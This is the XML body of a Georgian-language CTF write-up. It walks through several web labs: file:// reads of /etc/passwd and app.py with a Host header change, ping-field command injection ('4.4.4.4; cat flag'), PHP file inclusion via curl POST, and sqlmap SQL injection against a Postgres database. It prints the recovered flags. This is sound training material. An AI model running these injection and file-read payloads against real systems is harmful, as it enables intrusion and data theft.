        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>გამოყენება.</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3A12">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>.გავწეროთ შემდეგი ბრძანება file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CEA2A" w14:textId="536B64A3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ვიცით რომ ლინუქსში ყოველთვის არსებობს ფოლდერი passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EA1BCD" w14:textId="6B32DA98" w:rsidR="003D3A12" w:rsidRDefault="003D3A12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ართლაც რომ ამოაგდო რაღაც უკვე.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE1F44D" w14:textId="1DA78AB1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noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8067B1" wp14:editId="3F5210D5">
            <wp:extent cx="5943600" cy="291465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36365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534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073C" w14:textId="580367DD" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3A12">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>დაგვიბრუნა შემდეგი თითქოს გაურკვეველი ნაწერი. თუმცა ბოლოში კარგადჩანს რომარის მისამართი /home/ctf აი ეს კიშეგვიძლია გამოვიყენოთ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7839B975" w14:textId="318745B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D8B7DF0" wp14:editId="5B6B39F3">
            <wp:extent cx="3229426" cy="4467849"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="20291406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0696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DD7B" w14:textId="4625B608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ასევე თუ ვნახავთ response-ს ვნახავთ რომ აწყობილია python ზე.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2DF140" w14:textId="23FFA6AF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>შემდეგი რაც კი შეგვიძლია ვცადოთ ესარის default აპის გახსნა რასაც ხშირად app.py ქვია.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3E2A4" w14:textId="4B7F817C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შემდეგი მისამართი. </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="00006555">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:lang w:val="ka-GE"/>
          </w:rPr>
          <w:t>File:///home/ctf/app.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A650B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E6477" w14:textId="3653E086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noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD9551D" wp14:editId="7CBEF4C0">
            <wp:extent cx="5943600" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="179536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667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D0FA" w14:textId="259BCE50" w:rsidR="007A650B" w:rsidRDefault="007A650B" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A650B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">დაგვიბრუნა ძალიან საინტერესო ინფორმაცია. სადაც ნათლად ჩანს რომ ამ საიტმა პასუხი რომ დაგვიბრუნოს უნდა ვიყოთ Host სახელად company.tld. აი აქ კი დაგვეხმარება ზუსტად ის რაც ვახსენე აქამდე </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ბარპი</w:t>
      </w:r>
      <w:r w:rsidRPr="007A650B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D1822" w14:textId="333DA48C" w:rsidR="007A650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ბარპის გახსნის შემდეგ რომ შევდივართ ისევ ამ ფაილზე გვიგდებს ამ ფანჯარას</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0005415B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="720AF4AE" wp14:editId="221C5034">
            <wp:extent cx="5943600" cy="2451100"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="112183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391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a-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D12A51" w14:textId="5C247E6C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ჩვენი ჰოსტ სახელი სხვა არის და შევცვალოთ ხცელით.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B53F2" w14:textId="242C47A9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noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C5DD69" wp14:editId="2ECBD5C5">
            <wp:extent cx="5477639" cy="466790"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="102578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827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C2E" w14:textId="270BB8AF" w:rsidR="0005415B" w:rsidRDefault="0005415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</w:p>
    <w:p w14:paraId="5AB0A440" w14:textId="7C551987" w:rsidR="0005415B" w:rsidRDefault="0005415B" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0005415B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ctf{d8b7e522b0ab04101e78ab1c6ff68c4cb2f30ce9d4427d4cd77bc19238367933}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D15002" w14:textId="35FE0F9F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7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ping station</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F050D61" w14:textId="77777777" w:rsidR="00780F87" w:rsidRDefault="00780F87" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A09222F" w14:textId="7D448AE2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აიპიზე გადასვლისას გვხვდება შემდეგი:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990E987" w14:textId="77777777" w:rsidR="00780F87" w:rsidRDefault="00780F87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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD4673" w14:textId="7E47B76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054FA50" wp14:editId="77139292">
            <wp:extent cx="2400635" cy="1228896"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1243964936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4936" name="Picture 1" descr="A screen shot of a logi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71D5" w14:textId="61CF500B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რაღაც გასაპინგი ველი არის და ვცადოთ აბა რაიმე აიპის გაპინგვა.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193A5BC" w14:textId="37D456B5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პინგე 4.4.4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C55C290" w14:textId="4C6686CA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ამომიგდო ინტერნალ ერორი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B110F7D" w14:textId="00F67118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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095D596C" wp14:editId="76C6D30E">
            <wp:extent cx="5943600" cy="717550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="33663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343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6D91" w14:textId="6395197E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ვცადოთ და გავპინგოთ ლინუქსის კომანდებით იქნებ რაიმე გამოგვივიდეს და მოვიპოვოთ რაიმე ინფო.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BED405" w14:textId="77777777" w:rsidR="00780F87" w:rsidRDefault="00780F87" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2040171D" w14:textId="1566ABE9" w:rsidR="00780F87" w:rsidRDefault="00780F87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 xml:space="preserve">ვცადოთ 4.4.4.4; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC44A69" w14:textId="339237D4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იმუშავა და მივიღეთ შემდეგი</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00780F87">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B7485ED" wp14:editId="10429AA2">
            <wp:extent cx="1114581" cy="666843"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="140738163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81639" name="Picture 1" descr="A black text on a white background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7684" w14:textId="781C5559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ეს არის ჩამონათვალი ფაილების და აგერაა ფლეგი, ახლა კი ისღა დაგვრჩენია </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ქომანდით გავხსნათ იგი.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211621A" w14:textId="77777777" w:rsidR="00780F87" w:rsidRDefault="00780F87" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BBD9EC" w14:textId="313D486C" w:rsidR="00780F87" w:rsidRDefault="00780F87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უწერეთ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.4.4; cat flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>და მივიღეთ დროშაც</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623D62D3" w14:textId="03881599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16B13519" wp14:editId="274EC17F">
            <wp:extent cx="5506218" cy="1324160"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="511604595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04595" name="Picture 1" descr="A black and white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0AD1" w14:textId="0193D0FE" w:rsidR="00780F87" w:rsidRDefault="00780F87" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F87">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ctf{d8b7e522b0ab04101e78ab1c6ff68c4cb2f30ce9d4427d4cd77bc19238367933}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1ACD6" w14:textId="77777777" w:rsidR="00780F87" w:rsidRPr="00A2177E" w:rsidRDefault="00780F87" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11ACE5E9" w14:textId="30016751" w:rsidR="0005415B" w:rsidRDefault="00426629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8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>alien inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EE43E" w14:textId="77777777" w:rsidR="00426629" w:rsidRDefault="00426629" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608ABC60" w14:textId="7FA21EA2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იპიზე გადასვლისას გვხვდება შემდეგი </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A9E6F5" w14:textId="7C0E2416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noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F5171A" wp14:editId="058444D9">
            <wp:extent cx="2505425" cy="2553056"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="12549873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87337" name="Picture 1" descr="A screen shot of a computer cod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97DB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თუ დავაკვირდებით არის </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>და არის ფუნქცია სადაც ჩვენ შეგვიძლია ჩავერიოთ.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">გამოვიყენოთ ჩაშენებული ფუნქცია </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ი.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CED398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შეგვიძლია </w:t>
      </w:r>
      <w:r w:rsidRPr="00426629">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>გადავცეთ ჩვენი მოთხოვნა პოსტში.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
        <w:t>შემდეგი ბრძანებით:</w:t>
      </w:r>
      <w:r w:rsidRPr="00426629">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00426629">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>curl 35.198.135.192:30989/?start -X POST -d "start=/etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3151CFA9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DAFCF89" wp14:editId="6EA22255">
            <wp:extent cx="5943600" cy="3147695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="210810837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08377" name="Picture 1" descr="A computer screen shot of a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063D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მინიშნებაში გვაქ რომ ფლეგი არის </w:t>
      </w:r>
      <w:r w:rsidRPr="00426629">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">flag.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ში და აბა გავხსნათ ეგ ფაილი.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00426629">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 35.198.135.192:30989/?start -X POST -d "start=flag.php"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09FB86" w14:textId="77777777" w:rsidR="00426629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 მივიღეთ ფლეგი.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00426629">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2B2746" wp14:editId="688E91B4">
            <wp:extent cx="5487166" cy="552527"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161107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76628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5885" w14:textId="77777777" w:rsidR="00426629" w:rsidRDefault="00426629" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426629">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ctf{b513ef6d1a5735810bca608be42bda8ef28840ee458df4a3508d25e4b706134d}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605B0D04" w14:textId="77777777" w:rsidR="00426629" w:rsidRDefault="00426629" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74714DAD" w14:textId="77777777" w:rsidR="0094730F" w:rsidRDefault="00426629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9.</w:t>
      </w:r>
      <w:r w:rsidR="0094730F" w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>small data leak</w:t>
      </w:r>
      <w:r w:rsidR="0094730F" w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0094730F" w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0094730F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>შესვლისას გვხვდება შემდეგი ფეიჯი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECBED0C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0E21287C" wp14:editId="291AE1AF">
            <wp:extent cx="5163271" cy="1771897"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25146229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62298" name="Picture 1" descr="A close up of a sig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269C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ადაც ერთადერთი გამოსადეგარი არის რეგისტრაციის ღილაკი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  <w:t>მოდით დავრეგისტრირდეთ.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C"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607398E2" wp14:editId="4DBD0718">
            <wp:extent cx="5353797" cy="2200582"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2087856692" name="Picture 1" descr="A screenshot of a contact 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6692" name="Picture 1" descr="A screenshot of a contact us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4904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დავარეგისტრირეთ მოკლედ და როგორც ჩანს ეს ინახავს ბაზაში ამ მონაცემებს ანუ შეგვიძლია ბაზებთან მუშაობა ამ ლაბში.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F632A0D" w14:textId="77777777" w:rsidR="0094730F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t>გვაქვს hint:  /user?id= რომელსაც გამოვიყნებთ url-ში</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD13CB4" w14:textId="77777777" w:rsidR="0094730F" w:rsidRDefault="0094730F" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1304E795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ამოაგდო შემდეგი:</w:t>
      </w:r>
      <w:r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48B08C54" wp14:editId="0B5C8202">
            <wp:extent cx="5943600" cy="2799080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="161848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8117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95C2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მოვიყენოთ ჩაშენებული ფუნქცია </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">და ვცადოთ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ების ნახვა</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3FA4C" w14:textId="77777777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პროცესში ვნახულობთ რომ არის </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>POSTGRES</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C"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0FF883B6" wp14:editId="4BE18CEC">
            <wp:extent cx="3982006" cy="562053"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="904326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26708" name="Picture 1" descr="A screen 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84C"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t>-db ის დამატებით ვიღებთ შემდეგ ბაზებს</w:t>
      </w:r>
      <w:r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1E677284" wp14:editId="01A0F7F1">
            <wp:extent cx="5010849" cy="2295845"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7513689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68950" name="Picture 1" descr="A screenshot of a computer scree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lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">გავხსნათ ახლა </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ბაზა.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1930D1" w14:textId="4E562AB4" w:rsidR="00426629" w:rsidRDefault="0094730F" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094730F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>გავუშვათ ბრძანება sqlmap 35.198.135.192:31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>342</w:t>
      </w:r>
      <w:r w:rsidRPr="0094730F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>/user?id=1 -D public –tables</w:t>
      </w:r>
      <w:r w:rsidR="00426629">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00426629" w:rsidRPr="00426629">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14300A91" w14:textId="37409523" w:rsidR="0094730F" w:rsidRDefault="0094730F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მივიღეთ ფლეგის ნაწილი:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0094730F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A63176" wp14:editId="391691C7">
            <wp:extent cx="5943600" cy="1272540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="654810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058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66E" w14:textId="72A90240" w:rsidR="0094730F" w:rsidRPr="00C0284C" w:rsidRDefault="0094730F" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ახლა კი შეგვიძლია გავუშვათ ეს ქომანდი რომ გამოვიტანოთ მეორე ნაწილიც.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r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>sqlmap 35.198.135.192:31342/user?id=1 -D public -T ctf{57b23475b9b02093a9eb5d7df5f07957e2b2dc724443d6b08961fbe3387 –</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>colums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D683AF" w14:textId="77777777" w:rsidR="00A3776A" w:rsidRPr="00C0284C" w:rsidRDefault="00A3776A" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234987E2" w14:textId="4B0A3B11" w:rsidR="00A3776A" w:rsidRDefault="00A3776A" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>გამოგვიტანა მეორე ნახევარიც</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A3776A">
        <w:rPr>
          <w:noProof/>
